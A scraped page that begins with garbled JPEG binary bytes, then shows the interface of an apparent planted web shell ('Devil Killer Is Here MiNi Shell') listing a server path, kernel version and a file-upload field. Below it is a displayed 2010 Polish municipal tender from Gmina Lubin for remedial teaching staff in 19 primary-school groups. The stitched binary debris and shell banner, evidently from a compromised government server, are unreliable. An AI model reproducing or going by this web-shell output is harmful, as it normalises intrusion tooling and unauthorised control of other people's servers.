JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100910/287244-N-2010.html

<p class="kh_header"><b>Lubin: Nabór personelu do prowadzenia zajęć dydaktyczno - wyrównawczych 
w zakresie nauczania zintegrowanego</b><br>
<b>Numer ogłoszenia: 287244 - 2010; data zamieszczenia: 10.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubin , ul. Łokietka 6, 59-300 Lubin, woj. dolnośląskie, tel. (076) 8403100, faks (076) 8403140.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.ug-lubin.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nabór personelu do prowadzenia zajęć dydaktyczno - wyrównawczych 
w zakresie nauczania zintegrowanego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest nabór personelu do prowadzenia zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego. 
Zakres zamówienia obejmuje 19 zadań i dotyczy naboru personelu do prowadzenia zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego w okresie od X.2010 r. do k. V.2011 r. dla uczniów klas I-III  szkół podstawowych w ramach projektu pn.: RÓWNE SZANSE EDUKACYJNE UCZNIÓW WIEJSKIEJ GMINY LUBIN, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. 

Niniejsze zamówienie obejmuje 19 zadań:

Zadanie 1 - Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 1 (klasa I) w Szkole Podstawowej w Niemstowie.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.

Zadanie 2 -  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 2 (klasa II) w Szkole Podstawowej w Niemstowie.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin. 




Zadanie 3 -  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 3 (klasa III) w Szkole Podstawowej w Niemstowie.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin. 

Zadanie 4 -  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 1 (klasa I) w Filii Szkoły Podstawowej w Niemstowie w Osieku.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin. 

Zadanie 5 -  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 2 (klasa II) w Filii Szkoły Podstawowej w Niemstowie w Osieku.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.

Zadanie 6 - Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 3 (klasa III) w Filii Szkoły Podstawowej w Niemstowie w Osieku.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.  

Zadanie 7 -  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 1 (klasa I) w Szkole Podstawowej w Krzeczynie Wielkim.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin. 

Zadanie 8 -  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 2 (Klasa II) w Szkole Podstawowej w Krzeczynie Wielkim.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin. 

Zadanie 9 -  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 3 (klasa III) w Szkole Podstawowej w Krzeczynie Wielkim.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.

Zadanie 10-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 1 (klasa I) w Szkole Podstawowej w Siedlcach. 
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin. 

Zadanie 11-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 2 (klasa II) w Szkole Podstawowej w Siedlcach. 
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin, 

Zadanie 12-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 3 (klasa III) w Szkole Podstawowej w Siedlcach.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.

Zadanie 13-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 1 (klasa I) w Szkole Podstawowej w Szklarach Górnych.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.

Zadanie 14-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 2 (klasa II) w Szkole Podstawowej w Szklarach Górnych.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin. 

Zadanie 15-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 3 (klasa III) w Szkole Podstawowej w Szklarach Górnych.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.

Zadanie 16-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 1 (klasa I) w Szkole Podstawowej w Raszówce.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin. 

Zadanie 17-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 2 (klasa II a) w Szkole Podstawowej w Raszówce.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin. 

Zadanie 18-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 3 (klasa II b) w Szkole Podstawowej w Raszówce.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.

Zadanie 19-  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 4 (klasa III) w Szkole Podstawowej w Raszówce.
Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.

Za godzinę przyjmuje się, na potrzeby niniejszego zamówienia, tzw. godzinę lekcyjną trwającą 45 min.
Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów,  zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany. 


Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Zajęcia prowadzone będą w formie godzin lekcyjnych tj. po 45 min. Zajęcia prowadzone będą w grupach maksymalnie ośmioosobowych, w klasach I - III.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie potwierdzające spełnianie warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca
spełnia warunek jeżeli wykaże wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługi potwierdzającej co najmniej 6-cio miesięczne doświadczenie zawodowe na stanowisku nauczyciela nauczania zintegrowanego</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie potwierdzające spełnianie warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek jeżeli wykaże, że dysponuje przynajmniej jedną osobą posiadającą wykształcenie uprawniające do wykonywania zawodu na stanowisku nauczyciela nauczania zintegrowanego zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. (Dz.U. z 2009 r., Nr 50, poz. 400) w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli lub posiadającą kwalifikacje, które uprawniają do zatrudnienia na podstawie art. 7 ust. 1a ustawy o systemie oświaty</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie potwierdzające spełnianie warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie i na warunkach określonych poniżej:
a. Wysokości wynagrodzenia ze względu na zmianę prawa podatkowego powodującą zmianę obowiązkowej stawki podatku VAT na prace objęte umową.
b. Terminu rozpoczęcia ( nie wcześniej jednak niż od 01.10.2010r.) lub zakończenia prac (nie później jednak niż 31.05.2011r.) wywołanych przyczynami niezależnymi od Wykonawcy i Zamawiającego np. działania siły wyższej.
c. Miejsca realizacji zajęć, gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Wykonawcy i Zamawiającego. Nowe miejsce realizacji zadania wskazuje Zamawiający.
d. Dopuszcza się zmiany osoby prowadzącej zajęcia, wskazanej w §1 ust.3 wzoru umowy, w przypadku, gdy   konieczność zmiany wynika przyczyn losowych, niezależnych od Wykonawcy (np. śmierć, choroba powyżej 20 dni, rezygnacja, porzucenie pracy, nie wywiązywanie się z obowiązków określonych  w §3- §5 wzoru umowy i inne zdarzenia losowe).  Nowa osoba prowadząca zajęcia musi spełniać wymagania  w zakresie kwalifikacji  określone w ofercie. Powyższa zmiana nie spowoduje zmiany Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ug-lubin.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego: Urząd Gminy Lubin, ul. Łokietka 6a, pok. nr 9, 59-300 Lubin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.09.2010 godzina 10:00, miejsce: w siedzibie Zamawiającego: Urząd Gminy Lubin, ul. Łokietka 6, pok. nr 3-sekretariat, 59-300 Lubin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.: RÓWNE SZANSE EDUKACYJNE UCZNIÓW WIEJSKIEJ GMINY LUBIN, realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych współfinansowany jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 1 (klasa I) w Szkole Podstawowej w Niemstowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 -  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 2 (klasa II) w Szkole Podstawowej w Niemstowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 -  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 3 (klasa III) w Szkole Podstawowej w Niemstowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4 -  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 1 (klasa I) w Filii Szkoły Podstawowej w Niemstowie w Osieku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5 -  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 2 (klasa II) w Filii Szkoły Podstawowej w Niemstowie w Osieku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6 - Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 3 (klasa III) w Filii Szkoły Podstawowej w Niemstowie w Osieku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7 -  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 1 (klasa I) w Szkole Podstawowej w Krzeczynie Wielkim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8 -  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 2 (Klasa II) w Szkole Podstawowej w Krzeczynie Wielkim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9 -  Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 3 (klasa III) w Szkole Podstawowej w Krzeczynie Wielkim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia prowadzone będą w łącznym wymiarze 56 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Prowadzenie zajęć dydaktyczno-wyrównawczych w zakresie nauczania zintegrowanego dla gr. 1 (klasa I) w Szkole Podstawowej w Siedlcach.</p>
